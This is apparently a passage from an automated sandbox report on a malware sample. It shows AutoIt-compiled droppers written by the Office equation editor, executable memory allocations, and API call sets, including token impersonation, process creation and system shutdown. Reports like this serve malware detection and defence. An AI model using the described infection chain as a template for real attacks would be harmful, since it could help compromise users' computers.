memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a04743ab-d
Source: negrett.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b5ac6e26-5
Source: negrett.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd6a790b-0
Source: name.exe.5.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_af25db20-4
Source: name.exe.5.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd7c0de8-2

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\negrett.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0105D5EB: CreateFileW,DeviceIoControl,CloseHandle,

8_2_0105D5EB

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01051201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_01051201

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	5_2_00B7E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	8_2_0105E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	11_2_0139E8F6

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EA3AC	5_3_029EA3AC
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A061D9	5_3_02A061D9
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0794	5_3_029F0794
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D85C0	5_3_029D85C0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0B06	5_3_029F0B06
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EAB31	5_3_029EAB31
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F6E4A	5_3_029F6E4A
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F6C1B	5_3_029F6C1B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0DB0	5_3_029F0DB0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D6D20	5_3_029D6D20
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029E8D7D	5_3_029E8D7D
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A092EE	5_3_02A092EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A5B244	5_3_02A5B244
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F1332	5_3_029F1332
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029DB340	5_3_029DB340
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F70A7	5_3_029F70A7
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F1077	5_3_029F1077
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A37698	5_3_02A37698
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A41446	5_3_02A41446
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D7460	5_3_029D7460
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A05B6B	5_3_02A05B6B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A0D8FF	5_3_02A0D8FF
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029FBEA0	5_3_029FBEA0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029DBEF0	5_3_029DBEF0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A63C73	5_3_02A63C73
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B18060	5_2_00B18060
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B82046	5_2_00B82046
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B78298	5_2_00B78298
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4E4FF	5_2_00B4E4FF
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4676B	5_2_00B4676B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00BA4873	5_2_00BA4873
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B3CAA0	5_2_00B3CAA0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B1CAF0	5_2_00B1CAF0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B2CC39	5_2_00B2CC39
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B46DD9	5_2_00B46DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF8060	8_2_00FF8060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01062046	8_2_01062046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01058298	8_2_01058298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102E4FF	8_2_0102E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102676B	8_2_0102676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01084873	8_2_01084873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FFCAF0	8_2_00FFCAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101CAA0	8_2_0101CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01026DD9	8_2_01026DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100CC39	8_2_0100CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100B119	8_2_0100B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF91C0	8_2_00FF91C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011394	8_2_01011394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011706	8_2_01011706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100997D	8_2_0100997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010119B0	8_2_010119B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101781B	8_2_0101781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF7920	8_2_00FF7920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01017A4A	8_2_01017A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011C77	8_2_01011C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01017CA7	8_2_01017CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011F32	8_2_01011F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0107BE44	8_2_0107BE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01029EEE	8_2_01029EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_001936F0	8_2_001936F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D1560	9_2_003D1560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D1551	9_2_003D1551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D12B0	9_2_003D12B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D12C0	9_2_003D12C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A828F0	9_2_00A828F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82020	9_2_00A82020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8741A	9_2_00A8741A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A86858	9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8BDE1	9_2_00A8BDE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81D30	9_2_00A81D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A84AB8	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8828A	9_2_00A8828A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A856D8	9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82600	9_2_00A82600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81A40	9_2_00A81A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A83FE0	9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82BE0	9_2_00A82BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8B720	9_2_00A8B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82310	9_2_00A82310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A80F48	9_2_00A80F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A828E4	9_2_00A828E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82010	9_2_00A82010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A825F1	9_2_00A825F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81D20	9_2_00A81D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8F6D1	9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8EE21	9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8F279	9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A85FA4	9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8AF89	9_2_00A8AF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8AF98	9_2_00A8AF98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A863F8	9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82BD0	9_2_00A82BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A83FD4	9_2_00A83FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8FB29	9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A80F39	9_2_00A80F39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82300	9_2_00A82300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8B71F	9_2_00A8B71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A85B47	9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E6E0	9_2_00D2E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C6E8	9_2_00D2C6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C080	9_2_00D2C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2D3A8	9_2_00D2D3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2F3A8	9_2_00D2F3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2CD48	9_2_00D2CD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ED48	9_2_00D2ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E078	9_2_00D2E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2DA10	9_2_00D2DA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24A18	9_2_00D24A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D265D0	9_2_00D265D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E6D0	9_2_00D2E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ABD8	9_2_00D2ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C6D8	9_2_00D2C6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D245C0	9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D272C8	9_2_00D272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D208F0	9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D288F0	9_2_00D288F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D215F7	9_2_00D215F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D215F8	9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D222FF	9_2_00D222FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29EE0	9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ABE8	9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2A790	9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B497	9_2_00D2B497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2D39A	9_2_00D2D39A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20498	9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B498	9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2F398	9_2_00D2F398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2119F	9_2_00D2119F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D25888	9_2_00D25888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22BB0	9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D291B0	9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D238B7	9_2_00D238B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D238B8	9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D245BF	9_2_00D245BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D211A0	9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21EA7	9_2_00D21EA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21EA8	9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D284A8	9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22BAF	9_2_00D22BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21A50	9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22757	9_2_00D22757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22758	9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D26258	9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28D58	9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2345F	9_2_00D2345F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20040	9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B040	9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2624A	9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20D48	9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21A4F	9_2_00D21A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C076	9_2_00D2C076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D25878	9_2_00D25878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23460	9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29A60	9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24167	9_2_00D24167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24168	9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E068	9_2_00D2E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23D10	9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22300	9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28900	9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2DA00	9_2_00D2DA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23007	9_2_00D23007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23008	9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29608	9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23D0F	9_2_00D23D0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B031	9_2_00D2B031
